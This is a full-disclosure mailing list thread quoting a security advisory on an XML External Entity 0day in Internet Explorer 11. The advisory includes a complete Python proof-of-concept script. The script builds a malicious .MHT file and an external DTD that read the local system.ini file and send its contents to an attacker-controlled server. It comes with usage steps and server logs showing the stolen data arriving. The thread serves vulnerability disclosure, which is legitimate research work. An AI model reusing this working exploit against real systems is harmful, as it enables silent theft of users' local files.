[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [FD] Microsoft Internet Explorer v11 / XML External Entity Injection 0day
From: hyp3rlinx <apparitionsec () gmail ! com>
Date: 2019-04-16 13:30:00
Message-ID: CAFD2FDOGx+zkN0QQyq4687VKDJiGuX25n2iKafHh2UGnjPE1zA () mail ! gmail ! com
[Download RAW message or body]
Vimeo reinstated my account few hours later but I switched to youtube for
now.. but will check those out.
Thank you for that...
hyp3rlinx
On Tue, Apr 16, 2019 at 4:12 AM bo0od <bo0od@riseup.net> wrote:
> have your own videos either on one of the PeerTubes instances or have
> your own instance.
>
> https://joinpeertube.org/en/
>
> other good alternative would be:
>
> https://mediagoblin.org/pages/tour.html
>
> Enjoy!
>
> hyp3rlinx:
> > vimeo removed my account for no good reason so new POC url is included.
> >
> > [+] Credits: John Page (aka hyp3rlinx)
> > [+] Website: hyp3rlinx.altervista.org
> > [+] Source:
> >
> http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
>
> > [+] ISR: ApparitionSec
> >
> >
> > [Vendor]
> > www.microsoft.com
> >
> >
> > [Product]
> > Microsoft Internet Explorer v11
> > (latest version)
> >
> > Internet Explorer is a series of graphical web browsers developed by
> > Microsoft and included in the Microsoft Windows line of operating
> systems,
> > starting in 1995.
> >
> >
> > [Vulnerability Type]
> > XML External Entity Injection
> >
> >
> >
> > [CVE Reference]
> > N/A
> >
> >
> >
> > [Security Issue]
> > Internet Explorer is vulnerable to XML External Entity attack if a user
> > opens a specially crafted .MHT file locally.
> >
> > This can allow remote attackers to potentially exfiltrate Local files and
> > conduct remote reconnaissance on locally installed
> > Program version information. Example, a request for
> "c:\Python27\NEWS.txt"
> > can return version information for that program.
> >
> > Upon opening the malicious ".MHT" file locally it should launch Internet
> > Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K"
> > and other interactions like right click "Print Preview" or "Print"
> commands
> > on the web-page may also trigger the XXE vulnerability.
> >
> > However, a simple call to the window.print() Javascript function should
> do
> > the trick without requiring any user interaction with the webpage.
> > Importantly, if files are downloaded from the web in a compressed archive
> > and opened using certain archive utilities MOTW may not work as
> advertised.
> >
> > Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP"
> > users will get a security warning bar in IE and be prompted
> > to activate blocked content. However, when opening a specially crafted
> .MHT
> > file using malicious <xml> markup tags the user will get no such
> > active content or security bar warnings.
> >
> > e.g.
> >
> > C:\sec>python -m SimpleHTTPServer
> > Serving HTTP on 0.0.0.0 port 8000 ...
> > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
> > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET
> >
> /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA. \
> FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci]
>
> > HTTP/1.1" 200 -
> >
> >
> > Tested successfully in latest Internet Explorer Browser v11 with latest
> > security patches on Win7/10 and Server 2012 R2.
> >
> >
> >
> > [POC/Video URL]
> > https://www.youtube.com/watch?v=fbLNbCjgJeY
> >
> >
> >
> > [Exploit/POC]
> > POC to exfil Windows "system.ini" file.
> > Note: Edit attacker server IP in the script to suit your needs.
> >
> > 1) Use below script to create the "datatears.xml" XML and XXE embedded
> > "msie-xxe-0day.mht" MHT file.
> >
> > 2) python -m SimpleHTTPServer
> >
> > 3) Place the generated "datatears.xml" in Python server web-root.
> >
> > 4) Open the generated "msie-xxe-0day.mht" file, watch your files be
> > exfiltrated.
> >
> >
> > #Microsoft Internet Explorer XXE 0day
> > #Creates malicious XXE .MHT and XML files
> > #Open the MHT file in MSIE locally, should exfil system.ini
> > #By hyp3rlinx
> > #ApparitionSec
> >
> > ATTACKER_IP="localhost"
> > PORT="8000"
> >
> > mht_file=(
> > 'From:\n'
> > 'Subject:\n'
> > 'Date:\n'
> > 'MIME-Version: 1.0\n'
> > 'Content-Type: multipart/related; type="text/html";\n'
> > '\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"\n'
> > 'This is a multi-part message in MIME format.\n\n\n'
> >
> > '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n'
> > 'Content-Type: text/html; charset="UTF-8"\n'
> > 'Content-Location: main.htm\n\n'
> >
> > '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "
> > http://www.w3.org/TR/html4/transitional.dtd">\n'
> > '<html>\n'
> > '<head>\n'
> > '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n'
> > '<title>MSIE XXE 0day</title>\n'
> > '</head>\n'
> > '<body>\n'
> > '<xml>\n'
> > '<?xml version="1.0" encoding="utf-8"?>\n'
> > '<!DOCTYPE r [\n'
> > '<!ELEMENT r ANY >\n'
> > '<!ENTITY % sp SYSTEM "http://
> > '+str(ATTACKER_IP)+":"+PORT+'/datatears.xml">\n'
> > '%sp;\n'
> > '%param1;\n'
> > ']>\n'
> > '<r>&exfil;</r>\n'
> > '<r>&exfil;</r>\n'
> > '<r>&exfil;</r>\n'
> > '<r>&exfil;</r>\n'
> > '</xml>\n'
> > '<script>window.print();</script>\n'
> > '<table cellpadding="0" cellspacing="0" border="0">\n'
> > '<tr>\n'
> > '<td class="contentcell-width">\n'
> > '<h1>MSIE XML External Entity 0day PoC.</h1>\n'
> > '<h3>Discovery: hyp3rlinx</h3>\n'
> > '<h3>ApparitionSec</h3>\n'
> > '</td>\n'
> > '</tr>\n'
> > '</table>\n'
> > '</body>\n'
> > '</html>\n\n\n'
> >
> > '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--'
> > )
> >
> > xml_file=(
> > '<!ENTITY % data SYSTEM "c:\windows\system.ini">\n'
> > '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://
> > '+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
> > '<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">\n'
> > '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://
> > '+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
> > )
> >
> > def mk_msie_0day_filez(f,p):
> > f=open(f,"wb")
> > f.write(p)
> > f.close()
> >
> >
> > if __name__ == "__main__":
> > mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
> > mk_msie_0day_filez("datatears.xml",xml_file)
> > print "Microsoft Internet Explorer XML External Entity 0day PoC."
> > print "Files msie-xxe-0day.mht and datatears.xml Created!."
> > print "Discovery: Hyp3rlinx / Apparition Security"
> >
> >
> >
> >
> > [Network Access]
> > Remote
> >
> >
> >
> > [Severity]
> > High
> >
> >
> >
> > [Disclosure Timeline]
> > Vendor Notification: March 27, 2019
> > Vendor acknowledgement: March 27, 2019
> > Case Opened: March 28, 2019
> > MSRC reponse April 10, 2019: "We determined that a fix for this issue
> will
> > be considered in a future version of this product or service.
> > At this time, we will not be providing ongoing updates of the status of
> the
> > fix for this issue, and we have closed this case."
> > April 10, 2019 : Public Disclosure
> >
> >
> >
> > [+] Disclaimer
> > The information contained within this advisory is supplied "as-is" with
> no
> > warranties or guarantees of fitness of use or otherwise.
> > Permission is hereby granted for the redistribution of this advisory,
> > provided that it is not altered except by reformatting it, and
> > that due credit is given. Permission is explicitly given for insertion in
> > vulnerability databases and similar, provided that due credit
> > is given to the author. The author is not responsible for any misuse of
> the
> > information contained herein and accepts no responsibility
> > for any damage caused by the use or misuse of this information. The
> author
> > prohibits any malicious use of security related information
> > or exploits by the author or elsewhere. All content (c).
> >
> > hyp3rlinx
> >
> > _______________________________________________
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: http://seclists.org/fulldisclosure/
> >
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic